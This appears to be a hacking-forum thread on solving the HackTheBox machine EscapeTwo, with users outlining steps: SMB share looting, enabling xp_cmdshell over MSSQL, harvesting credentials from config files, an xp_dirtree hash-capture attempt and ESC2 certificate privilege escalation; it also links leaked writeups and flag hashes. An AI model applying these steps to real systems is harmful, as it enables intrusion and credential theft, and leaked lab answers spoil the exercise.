EscapeTwo
by nt0wl - Wednesday January 8, 2025 at 12:13 AM
#31
(Jan 12, 2025, 01:25 PM)travellerswimmer Wrote:
(Jan 12, 2025, 07:22 AM)who4mi Wrote: how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

(Jan 11, 2025, 11:04 PM)flast94711 Wrote:
(Jan 11, 2025, 10:54 PM)Zer0Gr2vity Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

Try searching all the .ini files. thats how i got it.
Reply
#32
(Jan 12, 2025, 02:32 PM)jabjab Wrote:
(Jan 11, 2025, 08:22 PM)macavitysworld Wrote: - xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

help, pls, im stucked at EXEC xp_dirtree "\\my-ip\share", have responder. NTLM requested to it. But john/hashcat with rockyou.txt have no crack

Yes it was not crackable. Did you activating xp_cmdshell instead and get a reverse shell with it ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Reply
#33
https://breachforums.rs/Thread-EscapeTwo

anybody having any issues, here is the link to writeup and also hashes to complete the room instantly
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 73 2,332 4 hours ago
Last Post: louikizzz
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 89 8,099 4 hours ago
Last Post: Xploitd
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 10 626 8 hours ago
Last Post: chufoni
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 28 2,849 8 hours ago
Last Post: chufoni
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,674 8 hours ago
Last Post: Johe

Forum Jump:


 Users browsing this forum: 1 Guest(s)